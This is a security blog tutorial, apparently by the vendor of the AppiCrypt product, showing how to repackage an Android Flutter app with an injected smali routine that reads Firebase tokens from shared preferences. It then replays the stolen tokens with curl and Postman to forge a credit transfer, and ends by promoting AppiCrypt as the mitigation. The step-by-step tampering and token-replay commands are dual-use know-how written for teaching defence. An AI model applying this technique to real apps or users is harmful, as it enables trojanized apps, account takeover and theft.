Protecting Your API from App Impersonation: Token Hijacking Guide and Mitigation of JWT Theft
Gone are the days of locally-held data and standalone applications. With the rise of smartphones and portable devices, we are constantly on the go and reliant on network calls for everything from social communication to live updates. As a result, protecting backend servers and API calls has become more crucial than ever.
Most of the time, the application uses an API to make HTTP requests to the server, and the server responds with the requested data. Most developers know this flow and use it every day. However, some data has restricted access: only certain users or entities may obtain it, and they need a way to prove who they are.
A typical method for authorizing requests (and therefore protecting data) is to use tokens signed by the server. The client sends an authentication request to the server; if authentication succeeds, the server issues a signed token and returns it to the client. The application then attaches this token to every request, so the server knows it is talking to an authorized entity. Although the token is valid only for a limited period (usually minutes), that window is long enough to exploit a leaked token, even manually.
The current standard is to carry these requests over HTTPS, which is protected by TLS. The whole exchange is encrypted, so even if attackers manage to capture a request, it is useless to them. This ensures the confidentiality of the communication: the attacker knows some communication is taking place but cannot read its actual content.
However, there is still an opportunity for an attacker to strike: a compromised client application crafted for token stealing. Attackers can impersonate a legit application after stealing a token. The server cannot tell whether it is talking to the legit application, a compromised application, or some other tool (e.g. curl, Postman, …). It just checks that the provided token is valid, fresh, and has the proper scope (hint: a stolen token still does).
There are multiple ways an app can be attacked and compromised in order to steal the token and use it for malicious purposes. Here are a few clear examples:
If an attacker gains access to a rooted device, they can misuse the token.
An attacker can create a tampered version of the app, distribute it, convince the user to install it, and then obtain a valid token from the tampered app to misuse it in an automated way.
Remote Code Execution and Escalation of Privilege vulnerabilities are discovered all the time; see https://source.android.com/docs/security/bulletin/asb-overview
For the purposes of this demonstration, we will be focusing on the second option.
The solution to these issues is to check clients’ integrity to ensure that:
A communicating party is a legit client — this blocks requests from other sources, such as Postman.
A communicating party can be trusted — the client’s integrity is intact (e.g. not tampered with), and it is running in a safe space (e.g. unrooted device).
Disclaimer: While we provide information on legitimate hacking techniques, we do not condone using this information for malicious purposes. Please only use this information for educational purposes.
The demonstration is presented on the Android platform; however, it is important to note that the iOS version is very similar in nature, and the same principles and considerations apply.
Let’s imagine a company that provides meal tickets as cash credit in its app. The app uses Firebase Authentication to authenticate users. The operation that sends credits from one person to another is handled by a Firebase Cloud Function. A JWT ID token is used to identify which user is sending their credits; this token can be retrieved from the Firebase instance after the user successfully authenticates.
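For context, here is a minimal Kotlin sketch of how an app typically obtains this ID token from the Firebase SDK (the function name is illustrative, not taken from the Let’s Eat app):

```kotlin
import com.google.firebase.auth.FirebaseAuth

// Fetch the current user's JWT ID token; this is what the app
// attaches to calls such as the credit-transfer Cloud Function.
fun fetchIdToken(onToken: (String) -> Unit) {
    val user = FirebaseAuth.getInstance().currentUser ?: return
    // forceRefresh = false reuses the cached token while it is still valid
    user.getIdToken(false).addOnSuccessListener { result ->
        result.token?.let(onToken)
    }
}
```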
Now for the hacking part — an overview of the attack.
First of all, we need to gain access to the application scope itself. There are several ways this can be done. In most cases, rooting a device would give us the access we need. For our demonstration, however, we chose application repackaging.
App tampering is currently quite easy. Using proper tools (apktool), you can decompile, modify and repackage the application. One only needs to entice potential victims into downloading a seemingly authentic application.
Wait a minute. Where would an ordinary user get a tampered app?
Despite best efforts, shady apps can be found in the store. With the rise of alternative stores and sideloading, you will likely find even more malware. Real-world examples could be apps that promise some advantage, or free versions of apps you would normally pay for.
Do you remember Tom’s article about stealing and attacking APIs? If not, we recommend giving it a read, but in a nutshell: Firebase stores essential information in shared preferences. You can access and parse this data without any problem, and then misuse it in API calls.
You can get the format of the API requests by proxying your own traffic. After that, you replay the requests with a stolen token using Postman, curl, or other software.
To strike a balance between “too abstract” and “too complicated”, some implementation details will be omitted as a story for another time.
Initially, we acquire the valuable APK file of the application. This can be achieved in many ways. The technique described here uses adb, a standard tool that should be in every developer’s toolbelt.
After installing the app, we need to get its package name. Using the terminal, we can list the package names of all installed apps/services with the command:
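The original listing is easy to reproduce with adb; the grep filter below is our assumption of how the output was narrowed down:

```shell
# List every installed package, then filter the list down to our target
adb shell pm list packages
adb shell pm list packages | grep mycompany
```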
This gives us a way shorter and cleaner list. Moreover, it contains the package name we are after: com.mycompany.letseat
Now we need to get the path where the APK file is stored. This time, we use the shell functionality of adb.
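The standard command for this is pm path:

```shell
# Ask the package manager where the installed APK lives
adb shell pm path com.mycompany.letseat
```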
This returns the path where APK is located. Using adb pull, we can extract this APK to our desired destination.
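A sketch of the pull, assuming a typical output of the previous command (the exact path on your device will differ):

```shell
# Copy the APK from the device into the current directory
adb pull /data/app/com.mycompany.letseat-1/base.apk letseat.apk
```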
Now we finally have the APK that we will tamper with. In the next section, we will decompile it, modify it, and repackage it.
In this part, we will mainly use apktool, a handy tool for reverse engineering Android APK files. You can download apktool from the link provided.
To decompile the APK, we will use the apktool d command. We are also going to set the output directory for better clarity.
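Assuming the APK was saved as letseat.apk, the command looks like this:

```shell
# d = decode; -o names the output directory
apktool d letseat.apk -o decompiled_apk
```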
The APK is extracted into the decompiled_apk folder and has a structure like this:
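The original screenshot is not reproduced here, but a typical apktool output looks roughly like this:

```
decompiled_apk/
├── AndroidManifest.xml
├── apktool.yml
├── assets/        (Flutter assets live here)
├── lib/
├── original/
├── res/
└── smali/
```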
We recommend playing around a bit and thinking of new ways to mess with the application (e.g. you can see the Flutter assets there; you could inject ads using assets). What we care about for now is the folder named smali and its subfolders com/mycompany/letseat (what does that path remind you of?).
The smali folder contains the decompiled code of the Android part of the Flutter app. Let’s look at MainActivity.smali for reference:
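The original listing is not shown here; for a Flutter app whose FlutterActivity superclass was minified to i, it would look roughly like this:

```smali
.class public Lcom/mycompany/letseat/MainActivity;
.super Lio/flutter/embedding/android/i;

# direct methods
.method public constructor <init>()V
    .locals 0

    invoke-direct {p0}, Lio/flutter/embedding/android/i;-><init>()V

    return-void
.end method
```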
It looks like some broken version of C#. What is this smali thing anyway?
Smali is an assembly-like language for the Dalvik VM, Android’s custom Java VM. What we just did is called baksmaling: producing smali code from a Dalvik executable (.dex). Apktool handles this “decompiling” for us, so we do not have to deal with .dex files directly. Smali code is used primarily in reverse engineering.
In the example above, you can make an educated guess: an <init> function is invoked, it belongs to the io/flutter/embedding/android package, and it lives in a class named i (the trailing V in the signature is just smali notation for a void return type). Let’s try to verify this guess.
The path io/flutter/embedding/android exists, and there is a file named i.smali. It even contains multiple references to the class’s constructor <init>().
However, something here is even more interesting. Look at the non-gibberish names: onCreate, onStart, onResume, onStop, onDestroy, … This looks like the Android activity lifecycle. We recommend reading up on it.
For now, all you need to know is that a lifecycle is a group of callbacks called when the app changes states (the app was launched, the app was put into the background, the device was rotated, …). We will choose onCreate as the place where we inject our code. However, this code has to be written in smali code. We have two options here:
Writing code directly in smali code (good luck with that)
Writing Kotlin/Java code, disassembling compiled code and copying that into the onCreate method
We are going to choose the second option and skip the creation and compilation of the helper app. The most important part is the code itself:
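The original listing is omitted here; a Kotlin reconstruction matching the description below might look like this (class and tag names are our own, and logging stands in for real exfiltration):

```kotlin
import android.app.Activity
import android.os.Bundle
import android.util.Log
import java.io.File

class MainActivity : Activity() {

    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        steal()
    }

    private fun steal() {
        // Shared preferences are plain XML files in the app's data directory
        val prefsDir = File(applicationInfo.dataDir, "shared_prefs")
        val files = prefsDir.listFiles()
        if (files == null) {
            // Nothing there yet, e.g. before the first login/auth
            Log.d("STEAL", "File not found")
            return
        }
        // A real attack would ship these to a remote server instead of logging
        files.forEach { Log.d("STEAL", it.readText()) }
    }
}
```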
In the onCreate method, we only call the steal() function. The stealing function then finds the shared preferences, iterates through all files, and logs their content (to keep this article concise, calls to the server are replaced by logging). Notice that the first run (before the first login/auth) will log “File not found”.
Now we can build our application into an APK and then decompile it. After decompilation, we go to the MainActivity.smali file and search for our steal() function. The smali code of the steal() function looks like this:
What we need to do now is to merge two smali codes carefully.
Copy steal invocation from MainActivity.smali to i.smali
Insert steal function from MainActivity.smali to i.smali
Fix package references in i.smali
After examination, we can see that the steal() function invocation in MainActivity.smali translates to a one-liner.
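A plausible reconstruction of that one-liner (the com/example/myapplication package comes from our throwaway project, so treat it as an assumption):

```smali
invoke-direct {p0}, Lcom/example/myapplication/MainActivity;->steal()V
```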
However, it is invoked from the wrong package name. Since all related functions in the Let’s Eat app are in the i.smali file, we need to reference it. Let’s fix that.
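After the fix, the invocation references the class we are injecting into:

```smali
invoke-direct {p0}, Lio/flutter/embedding/android/i;->steal()V
```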
Another surgical operation is copying the steal() function. After copying it, we need to update the package reference as well.
Notice the line below. When we get the application information, we invoke the call on the current instance, so the compiled reference points at our throwaway MyApplication package.
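The offending line would look something like this (again assuming the throwaway project’s package name):

```smali
invoke-virtual {p0}, Lcom/example/myapplication/MainActivity;->getApplicationInfo()Landroid/content/pm/ApplicationInfo;
```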
This would cause an error, since it references a package that does not exist in the context of the Let’s Eat app. However, getApplicationInfo() is available on any Android Activity, so you can rewrite the line as shown below without any problems.
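Rewritten against the base Activity class:

```smali
invoke-virtual {p0}, Landroid/app/Activity;->getApplicationInfo()Landroid/content/pm/ApplicationInfo;
```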
We successfully modified the code. Putting the project back into an APK is a straightforward process: apktool rebuilds it, and apksigner signs our package. Since the app has no RASP protection, the device will install it without any problem.
To rebuild the APK, we need to go one level above the decompiled APK (so we can refer to it by folder name). Then we use apktool.
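The build command (the output name is our choice):

```shell
# b = build; the result is a rebuilt but still unsigned APK
apktool b decompiled_apk -o letseat-tampered.apk
```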
A disadvantage of repackaging is that the original signature is gone, so we need to sign the APK by hand. An unsigned package is bad (and useless) because:
You cannot put it on the app store
You cannot install it properly (e.g. drag and drop the APK onto the emulator)
To sign an APK, you need a key. Since key generation is out of the scope of this article, we recommend going through the official Android developers guide.
For signing, you can use apksigner.
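A minimal signing invocation, assuming a keystore generated per the guide above:

```shell
apksigner sign --ks my-release-key.jks --out letseat-signed.apk letseat-tampered.apk
```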
Now you have an APK containing malicious code which exposes JWT.
When we run the application, we can see the format of the stolen payload.
First, we will try to query the Firebase API itself. This is handy when an app has a public Firebase REST API.
We will need to grab Firebase project_id from the mobile app:
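One place to find it is in the decompiled resources: the google-services Gradle plugin turns google-services.json into string resources, so res/values/strings.xml contains an entry like this (the value is illustrative):

```xml
<string name="project_id">letseat-example</string>
```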
Second, notice the refresh_token and access_token key-value pairs in the Firebase shared preferences file.
These can easily be misused together with project_id. Since the endpoint is the same for everyone, we only need to provide valid values. Be aware that these tokens have limited validity, and you will need to fetch fresh ones quite often.
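The article’s exact call is not reproduced here; a plausible sketch against Google’s public token endpoint looks like this (placeholders in angle brackets; google_api_key also sits in the decompiled strings.xml):

```shell
# Exchange the stolen refresh_token for a fresh access/ID token
curl -X POST "https://securetoken.googleapis.com/v1/token?key=<google_api_key>" \
  -d "grant_type=refresh_token&refresh_token=<refresh_token>"
```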
This request returns more data.
If you wonder where this project_id comes from, it is part of the google-services.json file, which you can find in the Firebase console.
Getting the format of the request is possible. For Flutter, you could use reFlutter. A more general approach would be a proxy. With a bit of time, you will get the format of the POST request in our example app:
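A plausible reconstruction of such a proxy capture (the function name and body fields are hypothetical; the URL follows the standard Cloud Functions scheme):

```
POST https://us-central1-<project_id>.cloudfunctions.net/sendCredits
Content-Type: application/json
Authorization: Bearer <access_token>

{"data": {"recipient": "<recipient-uid>", "amount": 100}}
```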
Forging requests in our example is done by providing the access_token in the request header.
We successfully transferred stolen money.
We can protect against this impersonation by adding an additional security control that implements the zero trust security model: AppiCrypt. Zero trust assumes that no device or application can be trusted by default. Instead of relying on traditional perimeter measures, it employs a variety of security controls to authenticate and authorize devices and applications before granting access to protected resources. This aligns with the OWASP MAS requirements from the MASVS-RESILIENCE and MASVS-AUTH control groups.
AppiCrypt makes protecting your backend API easy by employing the mobile app and device integrity state control, allowing only genuine API calls to communicate with remote services.
It generates a unique app cryptogram evaluated by a script on the backend side to detect and prevent threats like session hijacking (which we have just demonstrated), bot attacks or app impersonation.
The idea behind this technology is not just to protect APIs but to let your backend know when RASP controls have been overcome or turned off by attackers. The gateway can then easily block the session if the app’s integrity is compromised, and backends only process API calls if the RASP controls check out.
The cryptogram is inserted into a header; there is no need to change the payload of the message itself.
The cryptogram itself is an encrypted one-time value. You cannot modify it, and even if you manage to steal a payload containing a cryptogram, it is useless: a cryptogram cannot simply be reused. A nonce lets the server determine that the cryptogram belongs to your API call and was not replayed by an attacker. Using an old cryptogram will fail the check (the server will respond with code 403):
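Schematically, a replayed cryptogram would simply be rejected (the header name shown is illustrative, not AppiCrypt’s documented wire format):

```
POST /sendCredits HTTP/1.1
Authorization: Bearer <access_token>
X-AppiCrypt: <replayed cryptogram>

HTTP/1.1 403 Forbidden
```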
Where AppiCrypt excels is integration: it does not require calls to external APIs, it ensures low latency, and it does not introduce a single point of failure. The cryptogram is verified by a simple script running locally on your backend. AppiCrypt is a generic solution for all types of iOS and Android devices, with no dependency on Google Play or other OEM services.
You may have come across a similar technology, Firebase AppCheck. We want to emphasize the significant difference between AppCheck and AppiCrypt: AppCheck is not applied to every call, only during user enrollment, so there is still room for token theft. It prevents token issuance to untrusted clients, not token leakage afterwards. We compared these technologies in a previous article.
You can find more details about AppiCrypt on our website.
In this article, we looked at one way of attacking a mobile application. We showed how Firebase tokens can be stolen from the app and used to attack the API. We also explained how an APK file could be decompiled, what smali code is and how to add malicious code. Finally, we learned how we could protect ourselves from this attack.
This article focused on the Android platform, but a similar problem may occur on iOS or other mobile systems. From the user’s perspective, it is important to be careful when downloading and using applications from unverified sources and to check their permissions and reviews. From the developer’s point of view, mobile security is a constantly evolving area that requires attention and continuously updated knowledge.
We hope this article helped you understand the risks associated with mobile security and taught you some ways to minimize them.
Written by Jaroslav Novotný — Flutter developer, Tomáš Soukal — Security Consultant and Tomáš Biloš — Backend developer